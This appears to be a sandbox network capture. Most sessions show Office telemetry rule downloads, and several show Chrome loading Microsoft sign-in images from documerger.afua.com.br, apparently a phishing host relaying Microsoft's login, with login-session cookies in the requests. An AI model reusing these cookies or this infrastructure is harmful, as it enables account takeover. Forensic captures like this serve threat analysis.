                                                  2024-11-27 17:10:08 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  110192.168.2.64982113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:08 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 174
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                  ETag: "0x8DC582B91D80E15"
                                                  x-ms-request-id: 8c2ab7fe-e01e-0003-5b91-3f0fa8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171008Z-174f7845968kdththC1EWRzvxn00000009fg00000000qwez
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:08 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  111192.168.2.64983213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:10 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:10 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:10 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 501
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                  ETag: "0x8DC582BACFDAACD"
                                                  x-ms-request-id: f418fe9b-801e-0047-5281-3f7265000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171010Z-174f78459688l8rvhC1EWRtzr000000009sg00000000mdhp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:10 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  112192.168.2.64983113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:10 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:10 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:10 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 958
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                  ETag: "0x8DC582BA0A31B3B"
                                                  x-ms-request-id: c668448b-101e-007a-2d91-3f047e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171010Z-174f78459685726chC1EWRsnbg0000000x7000000000m1h1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:10 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  113192.168.2.64983013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:10 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:10 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:10 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1952
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                  ETag: "0x8DC582B956B0F3D"
                                                  x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171010Z-174f7845968j6t2phC1EWRcfe80000000xag00000000knz3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:10 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  114192.168.2.64983594.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:10 UTC1475OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:11 UTC738INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:10 GMT
                                                  Content-Type: image/x-icon
                                                  Content-Length: 17174
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                  ETag: 0x8D8731230C851A6
                                                  x-ms-request-id: 46979c23-001e-005c-5e33-40e1b1000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171010Z-1544c49f7f8lbbnshC1ZRHdt5c00000002ug000000003p56
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:11 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                  Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                  2024-11-27 17:10:11 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                  Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  115192.168.2.64983694.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:10 UTC1489OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:11 UTC805INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:10 GMT
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 621
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                  ETag: 0x8D8852A7FA6B761
                                                  x-ms-request-id: ee533db1-401e-004d-07ef-407b05000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171010Z-1544c49f7f8fm8qzhC1ZRHx53400000002u0000000002srk
                                                  x-fd-int-roxy-purgeid: 4554691
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:11 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                  Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  116192.168.2.64983313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:10 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:11 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:11 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2592
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB5B890DB"
                                                  x-ms-request-id: 8c2ab893-e01e-0003-5391-3f0fa8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171011Z-174f7845968px8v7hC1EWR08ng0000000xh0000000007apf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:11 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  117192.168.2.64983413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:10 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:11 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:11 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 3342
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                  ETag: "0x8DC582B927E47E9"
                                                  x-ms-request-id: db214257-301e-0052-7169-4065d6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171011Z-174f7845968n2hr8hC1EWR9cag0000000wtg00000000p0r8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:11 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  118192.168.2.64983794.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:11 UTC1488OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
